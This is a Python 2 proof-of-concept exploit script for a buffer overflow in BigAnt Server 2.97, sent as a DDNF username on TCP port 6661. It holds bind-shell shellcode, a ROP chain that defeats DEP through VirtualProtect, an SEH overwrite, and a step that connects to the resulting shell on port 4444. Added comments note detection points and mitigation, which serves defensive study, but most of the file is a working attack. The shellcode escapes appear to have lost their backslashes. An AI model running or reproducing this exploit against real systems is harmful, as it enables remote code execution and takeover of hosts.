
# Title : BigAnt Server 2.97 - DDNF Username Buffer Overflow
# Published : 2013-04-10
# Author :


#!/usr/bin/python
#Title: BigAnt Server 2.97 DDNF Username Buffer Overflow
#Author: Craig Freyman (@cd1zz) http://pwnag3.com
#Tested on: Windows 7 64 bit (DEP/ASLR Bypass)
#Similar Exploits: 
#http://www.exploit-db.com/exploits/24528/
#http://www.exploit-db.com/exploits/24527/
#http://www.exploit-db.com/exploits/22466/

import socket,os,struct,sys,subprocess,time

# Proof-of-concept listing as published (Python 2: print statements, str used as
# a byte buffer). What it shows a defender: a single request to the BigAnt service
# on TCP/6661, sent straight after connect with no prior authentication exchange in
# this script, carrying a "DDNF" command whose "username:" header is padded to a
# fixed 4000 bytes; the msfpayload comment above records the payload as a bind
# shell on TCP/4444. Those two observations -- an oversized DDNF username field on
# 6661 and a new listener on TCP/4444 on the target host -- are the detection
# points. The page does not state a vendor fix, so restricting who can reach
# TCP/6661 is the network-level mitigation it supports.
if len(sys.argv) < 2:
     # NOTE(review): exits with status 0 on a usage error; a non-zero status is conventional.
     print "[-]Usage: %s <target addr> " % sys.argv[0] + "r"
     sys.exit(0)

host = sys.argv[1]

#msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -b "x00x0ax0dx20x25x27" 
sc = (
"xd9xecxbax1fxafx04x2dxd9x74x24xf4x5dx2bxc9"
"xb1x56x31x55x18x03x55x18x83xc5x1bx4dxf1xd1"
"xcbx18xfax29x0bx7bx72xccx3axa9xe0x84x6ex7d"
"x62xc8x82xf6x26xf9x11x7axefx0ex92x31xc9x21"
"x23xf4xd5xeexe7x96xa9xecx3bx79x93x3ex4ex78"
"xd4x23xa0x28x8dx28x12xddxbax6dxaexdcx6cxfa"
"x8exa6x09x3dx7ax1dx13x6exd2x2ax5bx96x59x74"
"x7cxa7x8ex66x40xeexbbx5dx32xf1x6dxacxbbxc3"
"x51x63x82xebx5cx7dxc2xccxbex08x38x2fx43x0b"
"xfbx4dx9fx9ex1exf5x54x38xfbx07xb9xdfx88x04"
"x76xabxd7x08x89x78x6cx34x02x7fxa3xbcx50xa4"
"x67xe4x03xc5x3ex40xe2xfax21x2cx5bx5fx29xdf"
"x88xd9x70x88x7dxd4x8ax48xe9x6fxf8x7axb6xdb"
"x96x36x3fxc2x61x38x6axb2xfexc7x94xc3xd7x03"
"xc0x93x4fxa5x68x78x90x4axbdx2fxc0xe4x6dx90"
"xb0x44xddx78xdbx4ax02x98xe4x80x35x9ex2axf0"
"x16x49x4fx06x89xd5xc6xe0xc3xf5x8exbbx7bx34"
"xf5x73x1cx47xdfx2fxb5xdfx57x26x01xdfx67x6c"
"x22x4cxcfxe7xb0x9exd4x16xc7x8ax7cx50xf0x5d"
"xf6x0cxb3xfcx07x05x23x9cx9axc2xb3xebx86x5c"
"xe4xbcx79x95x60x51x23x0fx96xa8xb5x68x12x77"
"x06x76x9bxfax32x5cx8bxc2xbbxd8xffx9axedxb6"
"xa9x5cx44x79x03x37x3bxd3xc3xcex77xe4x95xce"
"x5dx92x79x7ex08xe3x86x4fxdcxe3xffxadx7cx0b"
"x2ax76x8cx46x76xdfx05x0fxe3x5dx48xb0xdexa2"
"x75x33xeax5ax82x2bx9fx5fxcexebx4cx12x5fx9e"
"x72x81x60x8b")

#rop chain generated with mona.py - www.corelan.be
# Per the gadget annotations below, every address lies in expsrv.dll and the chain
# ends in a VirtualProtect call (the IAT pointer on the second entry). The DEP
# bypass therefore depends on that one module; the header's "DEP/ASLR Bypass"
# claim presumably means it loads at a fixed address on the tested build -- not
# verifiable from this page.
rop_gadgets = ""
rop_gadgets += struct.pack('<L',0x0f9edaa9)	# POP EDX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0fa021cc)	# ptr to &VirtualProtect() [IAT expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9ea2a7)	# MOV ECX,DWORD PTR DS:[EDX] # SUB EAX,ECX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e0214)	# PUSH ECX # SUB AL,5F # POP ESI # POP EBP # RETN 0x24 [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0f9ee3d9)	# POP ECX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0F9A5001)	# &Writable location 
rop_gadgets += struct.pack('<L',0x0f9f1e7c) # POP EDX # RETN  [expsrv.dll] 
rop_gadgets += struct.pack('<L',0xffffffff) # EDX starting value
for i in range(0,65): rop_gadgets += struct.pack('<L',0x0f9dbb5a)  # INC EDX # RETN ghetto style [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e65b6) # POP EAX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0xfffffdff)	# Value to negate, will become 0x00000201
rop_gadgets += struct.pack('<L',0x0f9f2831) # NEG EAX # RETN [expsrv.dll]  
rop_gadgets += struct.pack('<L',0x0f9c5f4b) # POP EDI # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0FA0C001) # put this in edi so the nex one doesnt die, writable for edi
rop_gadgets += struct.pack('<L',0x0f9e2be0) # PUSH EAX # OR BYTE PTR DS:[EDI+5E],BL # POP EBX # POP EBP # RETN 0x08    ** [expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9e24f9) # push esp # ret 0x08 |  {PAGE_EXECUTE_READ} [expsrv.dll
rop_gadgets += struct.pack('<L',0x0f9c5f4b)	# POP EDI # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0f9e5cd2)	# RETN (ROP NOP) [expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9c8a3e)	# POP EAX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x909006eb)	# nop with a ninja jump
rop_gadgets += struct.pack('<L',0x0f9f30c2)	# PUSHAD # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e5cd2)	# RETN (ROP NOP) [expsrv.dll]

# Field layout, in the order the sploit line concatenates them: 684-byte pad,
# SEH handler overwrite (the ADD ESP gadget), 1592-byte pad, ROP chain, stack
# adjustment bytes, payload, then "D" padding so the username is always exactly
# 4000 bytes regardless of payload size. A fixed-length 4000-byte username is the
# simplest wire-level signature of this request.
front = "A" * 684
seh = struct.pack('<L',0x0f9eeb8a) # ADD ESP,1004 [expsrv.dll]
back = "C" * 1592
stack_adjust = "x81xc4x24xfaxffxff"
junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc))) 

sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk
print "[+] Sending pwnag3 to " + str(host)

# Delivery: one connection to TCP/6661 and a single send() of the DDNF request.
try :
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host,6661))
	s.send(""
	"DDNF 17n"
	"classid: 100n"
	"cmdid: 1n"
	"objid: 1n"
	"rootid: 3n"
	"userid: 8n"
	"username: "+sploit+
	"rnrn")
	time.sleep(1)
# NOTE(review): the bare except swallows the actual error (connection refused,
# timeout, name resolution) behind a generic message, and the socket is not
# explicitly closed before sys.exit() on this path.
except:
	print "[-] There was a problem"
	sys.exit()

# Post-exploitation step as published: waits, then opens an interactive telnet to
# the bind shell port. host comes from argv and is interpolated into a shell
# string (shell=True); a list-form argv would be the safer idiom. s.close() only
# runs after the telnet session ends.
print "[+] Getting your shell. "
time.sleep(3)
subprocess.Popen("telnet "+host+" 4444",shell=True).wait()
print"[*] Done." 
s.close()